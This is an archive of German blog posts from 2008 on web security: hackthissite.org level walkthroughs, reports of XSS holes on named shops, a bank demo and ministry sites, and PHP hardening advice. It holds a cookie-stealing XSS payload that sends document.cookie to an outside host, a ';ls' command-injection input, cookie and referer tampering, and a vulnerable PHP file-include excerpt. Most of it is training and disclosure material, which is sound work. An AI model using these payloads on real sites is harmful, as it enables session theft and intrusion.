Direkt zum Hauptbereich

Posts

Es werden Posts vom Juni, 2008 angezeigt.

Hachthissite realistic level 9 tutorial

So hier sind mal zwei Videos für hackthissite.org realistic level 9. Im ersten Video wird das xss durchgeführt um das cookie zu kopieren, dann die identität getausch, gehalt überwiesen und im zweiten Video wird das logfile gelöscht. Für realistic 1-8 gibts schon videos auf youtube. Sollte ich mich täuschen dann melden kann natürlich nachgereicht werden. In der Textbox, stehen alle code Schnipsel welche bentigt werden um das Video nachzuvollziehen. javascript:alert(document.cookie);<\/textarea><script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script>

wo sind alle unsre Daten hin??

Dass kann mit Sicherheit der ein oder andere webmaster singen. Oder man hatte bisher einfach nur Glück, das niemand Lust hatte diverse SQL-injections auszunutzen. Viele viele, einfach zu viele Seiten bieten die Möglichkeit einer sql-injection. Per Suchformular oder Login, oder über einen GET oder Post Parameter. Wenn man sich mal auf ein Paar Seiten umschaut dann wundert es einen nicht dass hin und wieder eine Seite fremde Inhalte führt !! Viele Wege führen nach Rom oder in deine Datenbank. Also nochmal zum Mitschreiben. Ich weiß Sicherheit ist ein lästiges Thema, bringt kein Geld und sowieso was soll dass denn es ist doch "nur" ne Internetseite...... So oder änlich scheinen diese webmaster oder immer öfter auch Programmierer zu denken. Oder aber Sie wissen schlichtweg nichts über Angriffstechniken. Ich empfehle sich jedem bei wikipedia mal über sql-injection zu infomieren. Dort gibt es auch ein paar Weiterführende Links. Zum ganz kurz antesten... einfach mal " OR oder &

Zertifizierte Online-Shops, trügerische Sicherheit!

Online Shopping Sicherheit Trusted Zertifikate gibt es mittlerweile wie Sand am Meer. Doch was taugt ein Zertifizierter Shop überhaupt. Was meinen die mit "trusted"...... ist "https" ?? Reicht dass schon ?? Ich habe mit das Zertifikat vom Tüv mal genauer unter die Lupe genommen. Und musste feststellen dass bei einigen Shops trotz (trusted, save, zertifiziert) und anderen ominösen Auszeichnungen. Es offensichtliche Sicherheitslücken gibt. Diese musste ich nicht suchen, sonder die sind mir geradezu ins Auge gesprungen. Bei ciao.de zum Bleistift ist XSS möglich. Und das ohne Probleme und Einschränkungen. XSS ist allgemein bei vielen Shops möglich. Am besten ist es für einen Angreifer, Shop mit community und einem einheitlichen Login. Es sind nicht nur mini Shops welche unsicher sind. Es sind OnlineShops von Beate-Uhse, Karstadt-Quelle etc dabei. Also nicht nur komische Läden wo niemand einkauft!! So wird es leicht gemacht Daten auszulesen, und man kann den XSS Code se

Seitenbetreiber und Sicherheit??

Also ich weiß nicht wie es die Seitenbetreiber des Landes ja aber auch Firmen mit Sicherheitslücken umgehen!! Es scheint den meisten relativ egal zu sein. Frei nach dem Motto ach sollen die doch die Datenbank Löschen ;-) Nur zu auf hopp. Also Liebe Webmaster ich will es mal ohne Technogebrabbel mit einem einfachen für jeden verständlichen Beispiel erklären: Würdet ihr euer Auto nicht Abgeschlossen, am Besten mit offenen Türen, Schlüssel in der Zündung Steckend, in der Königstraße stehen lassen? Ich weiß nicht aber ich würde mal sagen mit Sicherheit nicht. Denn dann könnte es ja geklaut werden. Daher muss ich mich fragen, warum lassen dann manche ihre Internetseite einfach so mit offenen Türen und den Schlüssel in der Zündung Steckend im Internet stehen???? Okay ihr wisst es vielleicht nicht. Aber wenn ich euch ne email schicken würde mit dem Hinweis, Hey dein Porsche steht mit offenen Türen und laufendem Motor auf dem Hof ich könnte jede Wette abschließen dass ihr sofort herunter Stürm

Spass mit XSS

Hier ist ein nochmal ein kleines XSS. Diesmal im Online Banking Portal der Postbank. Also hier ist der Link damit ihr in das Demo Online Banking Konto kommt. DEMO KONTO So, nun geht auf Kontoumsätze. Gebt hier im Feld Buchungshinweise..... folgendes ein: "> <script>alert('XSS')</script><iframe src="http://google.de"></iframe> So nun könnt ihr sehen was mit der Postbank so alles möglich wird.

Große Online Shops mit XSS Lücken

Es wundert mich wirklich dass es so viele Seiten gibt welche für XSS anfällig sind. Bisher waren es ja nur, in anführungszeichen, Ministerien,bundestag und das ein oder andere Social Network. Aber dass es tatsächlich auch Online Shops gibt welche XSS anfällige Seiten haben dass ist mir neu. Darunter sind auch Shops mit dem achso tollen "trusted Shop" Siegel. Uhh ein "trusted Shop" da fühl ich mich gleich sicherer und kann mich ja einloggen. Schwups sind die Zugangsdaten verschwunden. Da hätt ich doch besser ein Handtuch mitgenommen dann wär dass nicht passiert. Zurück zur Sicherheit. Also ich hab mich nun ein bisschen umgeschaut und es ist erstunlich was man mit dem ein oder anderen Online Shop so alles anstellen kann. Und erstaunlich auf vielen Shops kann man iframes einbetten, JavaScript ausführen, neue Login Seiten erstellen. Also ganz gesund ist dass ja nicht. Und ich möchte nicht wissen wie viele Menschen die Lücken in Online Shops schon ausnutzen um aktiv Date

Fehlerseiten mit Folgen........

Also ich habe ja schon viel gesehn. Eigentlich, so dachte ich bisher. Sollte dass Land die Datensicherheit und auch die Sicherheit ihrer Internetseiten ernst nehmen. Wie ich gestern schon berichtet hatte, hat das Land Baden-Württemberg einige XSS Probleme auf ihren Internetseiten. Hier mal Chief Wiggum als Minister ;-) !! Hier die Fehlerseite !! Aber eins nach dem anderem. Durch dass Kommentar von Harry wurde ich auf die Problematik mit der Fehlerseite aufmerksam gemacht. Dass dort noch die Muster Vorlage mit Muster AG ausgegeben wird. Das ist zwar nicht sehr Proffessionell aber naja. Also habe ich die Fehler url mal im Kultusministerium ausprobiert. Und Ohje Ohje, das für XSS und wer weiß für was noch alles Anfällige Pyrobase, selbstverständlich von der Telekom ;-) Wird in vielen weiteren Ministerien eingesetzt und damit man es nicht so schwer hat diese alles zusammenzufriemeln hilft das Land und gibt als Fehlerseite eine Liste mit allen Pyrobase Ministerien

Naja schon wieder ein Ministerium mit XSS

Also ich weiß auch nicht so recht was ich dazu sagen soll. Wieder mal ein Ministerium mit dem man komische Meldungen in die Welt posaunen kann. Hier ist ein Link zum Kultusministerium Baden-Württemberg Diesmal geb ich gleich mal ein wink zum BSI mit. Immerhin gibt dieses Ministerium ein PDF heraus welches bei den anderen Ministerien noch nicht angekommen ist ;-) Der Link steht bei mir im Blog, dort ist auch beschrieben wie man es besser als die Telekom macht ;-)!! Aber jetzt ist es auch klar warum der Fehler im System ist. Redaktionssystem und Hosting: Pirobase ©, Pironet NDH AG Theodor-Heuss-Str. 92-100, 51149 Köln T-Systems International GmbH

Das Land Baden-Württemberg als heimlicher Simpsons Fan!!

Das Land Baden-Württemberg mag die Simpsons doch sehr! Chief Wiggum als Minister?? Aber hier schaut euch doch selbst die Meldung an ! Baden-Würrtemberg und die Simpson Ja dass ist selbstverständlich keine Meldung des Landes Baden-Württemberg, das ist doch irgendwie von vorne rein klar?? Oder etwa nicht? Das zeigt mal wieder wie unschön große Agenturen arbeiten..... Ah für alle die das hier irgendwie interessant finden, ich, also der Autor bin momentan auf der Suche nach einer neuen Arbeitsstelle!! Am liebsten als Penetrationstester in einer Sicherheitsfirma aber gerne auch bei Internet Firmen welche Ihre Seiten immer sicher haben wollen ;-) Mein schwerpunkt liegt bei den Web-Applicationen. Und in der Programmierung kenne ich mich bestens in PHP, Java, HTML (kombi AJAX).Und einigermaßen kann ich auch C, wird aber ständig verbessert! Bei interesse einfach mal ne mail senden..... Ps: Ich weiß wie man es sicher macht ! *fg* Mein Öffentlichen P

Soziale Netze und die Sicherheit! Report Kwick!

Die Sozialen Netzwerke, neudeutsch: Social Networks, halten nicht allzu viel von Sicherheit. Vor allem müssten die Entwickler viel mehr für das Thema XSS Sensibilisiert werden. D enn Potentielle Angreifer finden jede Schwachstelle im System. Und wer lange genug sucht der wird imme r fündig. Es sollte den An greifern nur nicht allzu einfach gemacht werden. Kwick.de hatte bis zum 20.06.08 auch noch oder wieder ein Problem mit XSS. Betroffen waren so gut wie alle Suchformulare auf der Seite. Per zufall bin ich auf diesen Umstand aufmerksam geworden. Eines sei gesagt. Bei Kwick kann man sich nun getrost Anmelden denn die Sicherheitslücke wurde sofort behoben. Also eine sichere Sache. Andere Social Networks haben ähnliche XSS Probleme, eigentlich erschreckend viele. Die Namen möchte ich nicht nennen denn sonst rennen vielleicht ein Paar Dummys dahin und testen es gleich......... Nachdem ich dieses Problem dem Betreiber gemeldet hatte wurde es auch Postwendend behoben. Nur aus diesem Gru

PHP Skripte absichern

Bei PHP ist es immer dann Kritisch sobald Benutzereingaben erfolgen. Durch SQL injection & co sind die meisten Entwickler schon aufmerksam wenn Sie Benutzereingaben an eine Datenbank weiterreichen. Leider setzt diese Aufmerksamkeit häufig aus sobald die Daten nicht an die Datenbank sondern nur auf dem Bildschirm wieder ausgegeben werden. Als Beispiel nehmen wir hier mal ein Suchformular, wie bei google. Bei einem Fehler, oder wenn das Skript nichts findet wird der Suchstring wieder in das Suchformular eingesetzt und der Benutzer sieht wieder das Suchformular mit seinem Suchwort im Suchfeld. ( Download Beispielskript) Genau in diesem Szenario sind viele noch zu Leichtsinnig. Ja die Daten machen nichts am Server und Datenbank. Aber der Benutzer kann hier Opfer einer XSS ( Cross Site Scripting ) Attacke werden. Wenn die Benutzereingabe wie so oft nur schlecht oder garnicht geschützt werden. Sich nur auf das Modul Magic Quotes von PHP zu verlassen, sofern aktiviert, reicht leider nich

PHP Sicherheit-- Einlesen von Systemdateien

Mittlerweile hat es sich ja bei den meisten PHP Entwicklern herumgesprochen dass Sie mehr Wert auf die Sicherheit ihrer Skripte legen müssen oder sollten. Daher ist es immer wieder erstaunlich wie viele Skripte tatsächlich noch anfällig gegen die einfachsten Angriffe sind. Heute möchte ich eine Simple Angriffsmethode erläutern, Sie beruht darauf dass ein Skript gegeben ist welches eine Date includiert. In der Url sieht dies Beispielsweise so aus: http://www.irgendwas.net/page.php?page=Home.txt Nun wie sieht es in dem php Skript page aus? Im detail weiß man dass nie ganz genau. Aber der grobe Ansatz schaut folgendermaßen aus: /** Auszug aus einem anfälligen PHP Skript! Zu tutorial!! **/ if(isset($_GET['page'])) { print $_GET['page']; $fp = fopen($_GET['page'], "r"); $HTML = fread($fp, filesize($_GET['page'])); fclose($fp); print $HTML; } ?> So oder ähnlich sind diese Skripte aufgebaut. Es ist auch denkbar

hackthissite.org Level 10 Basic Lösung

m Level 10 wird es etwas tricky. Hier bekommst du nur den wink dass du dir das cookie und die Seiteninfos anschauen sollst. Also machen wir dass doch mal. Und bei den cookies wirs du mit Sicherheit fündig dort gibt es den Eintrag: level10_authorized = no. Also wir müssen nur diesen Wert auf yes setzen und die Seite erneut aufrufen damit wir dieses Level geknackt haben. Am einfachsten änderst du dass cookie in dem du in der URL deines Browsers folgendes eingibst. Also wichtig ist, die adresse von hackthissite.org solltest du kurz entfernen aber noch auf der Seite bleiben und folgendes eingeben: javascript:document.cookie="level10_authorized=yes";alert("OK"); So nun führst du auf der Seite vom level10 Java Script Code aus. In unserem falle wird jetzt dass cookie mit dem Wert yes gesetzt damit man dieses level abgeschlossen hat! Es gibt noch ne Möglichkeit via http header aber die finde ich zu unständlich dieses schnelle javascript ist einfacher ;-)

hackthissite.org Level 9 Basic Lösung

Hier wurde das Passwort wieder mal in einer Datei welches im Verzeichniss /var/www/hackthissite.org/html/missions/basic/9/ liegt abgespeichert. Doch wie listen wir dieses Verzeichniss?? Eine Idee?? Genau. Zurück zu level 8!! Und in das Feld für den Namen diese Zeile eingeben: Schwupps hast du den Inhalt des Verzeichnisses vor dir. Hi, index.php p91e283zc3.php! Your name contains 24 characters. So und nun sich die Datei p91e283zc3.php anzeigen lassen und du hast das Passwort.

hackthissite.org Level 8 Basic Lösung

Hier ist ein eingabeformular in welches du deinen Namen schreiben sollst damit es eine Datei anlegen kann. Zum besseren Verständniss einfach mal testen, also "Mustermann" und auf submit klicken. Nun erscheint der Text: Your file has been saved. Please click here view the file. Hier ist die URL der Datei, welche angelegt wurde: http://www.hackthissite.org/missions/basic/8/tmp/mnxdljrz.shtml Genau, es ist eine shtml Datei also ein Server Side Include (SSI) damit kann man Befehle auf dem Server ausführen lassen und das ergebniss wird dann dem client übergeben! Hier musst du aber das Verzeichniss auslesen damit wir informationen über den Inhalt bekommen. Geb nun einfach mal folgendes in das Feld für den Namen ein: Richtig, ls bei unix/linux "list directory" zeigt den Inhalt eines Verzeichnisses an. Das neu hinzugefügte hier ist "ls ../" ../ heißt ein Verzeichniss nach oben. Also nicht in http://www.hackthissite.org/missions/basic/

hackthissite.org Level 7 Basic Lösung

Hier siehst du ein Eingabefeld in welches du ein Datum eingeben kannst. Und dieses zeigt die Dazu den Kalender an. Zum Beispiel : 2008 Jetzt siehst du alle Monate von 2008 als Kalenderblätter dargestellt. Dies ist nicht besonders wichtig. Gut zu wissen ist dass dies die Ausgabe des Unix Commandos "cal " ist. Unter Unix kann man mit ";" eine Zeile in der Shell beenden und einen neuen Befehl eingeben. Wir wollen das Verzeichniss listen, also "ls" list directory. Die Eingabe lautet also " ;ls " so nun auf view klicken und du bekommst folgende Ausgabe: . .. level7.php cal.pl .htaccess k1kh31b1n55h.php index.php Dies ist der Inhalt des Ordners. Die Kryptische Datei an die Url anhängen, also diese: k1kh31b1n55h.php. In der Url sollte stehen http://www.hackthissite.org/missions/basic/7/k1kh31b1n55h.php Enter und du siehst dass Passwort. Wieder zurück zum login, eingeben un

hackthissite.org Level 6 Basic Lösung

Im Level 6 geht es um eine kleine Decheffrierung. Also du siehst hier ein Verschlüsseltes Passwort und sollt dieses Entschlüsseln damit du es eingeben kannst und somit einen level weiter kommst. Du hast hier eine Hilfe, denn du kannst mit dem oberen Formular selbst daten verschlüsseln. Somit kannst du ein Muster erkennen wenn du zum Beispiel hallo oder auch tasse verschlüsseln lässt. Wenn du nun ollah oder essat verschlüsseln lässt dann fällt etwas auf oder?? Die Erklärung: hallo wird zu hbnos tasse wird zu tbuvi essat wird zu etudx Die cheffrierung funktioniert folgend: Du solltest zum verständniss eine ASCII Tabelle heranziehen! Formel: Verschlüsseltes Zeichen = (Position in String) + (Aktuelles Zeichen, ASCII Code) Somit ist auch klar warum das erste Zeichen sich nie verändert. Da es mit 0 anfängt zu Zählen. h = 0 ( +0) Bleibt gleich. a = 1 ( +1) l = 2 ( +2) l = 3 ( +3) 0 = 4 ( +4) Hier die Decheffrierung des Verschlüsselten Textes:

hackthissite.org Level 5 Basic Lösung

Level 5 ist fast gleich wie der Level 4 nur mit dem kleinen Unterschied dass das Skript auf dem Server nun auch schaut woher die Anfrage kommt. Es überprüft also die Referer Url. Damit wir dies umgehen können wird das Skript aus 4 nur Modifiziert. Der HTTP Anfrage wird folgende Zeile hinzugefügt: Referer:http://www.hackthissite.org/missions/basic/5/index.php\r\n So und schon ist auch dass Problem behoben! Das Skript level5.php gibts auch zum Download.

hackthissite.org Level 4 Basic Lösung

So nun wird es etwas umständlicher. Hier gibt es einen Button mit dem man sich dass Passwort zusenden lassen kann falls man es vergessen hat. So nu den Quelltext öffnen. Die Zeilen 98,99 Wie man hier sieht wird das ganze an eine email Adresse versendet, welche über einen Post Parameter übergeben wird. Hier im Spiel wird keine Email versendet, sondern wenn die Post anfrage eine Andere Email Adresse als diese enthält dann zeigt dass Skript dass Passwort an. Ich habe mich für die Lösung mittels PHP Skript entschieden, da dies sehr komfortabel ist. Das Listing level4.php kann man downloaden . Ich erläutere mal das vorgehen dieses Sriptes: Mittels fsockopen stelle ich zuerst eine Verbindung zum host her, In unserem Fall jetzt: $host = "hackthissite.org"; Wenn dies klappt dann fordere ich die folgende Seite an: $page = "missions/basic/4/level4.php"; Damit ich jetzt auch dass Passwort angezeigt bekomme muss ich noch einen Wert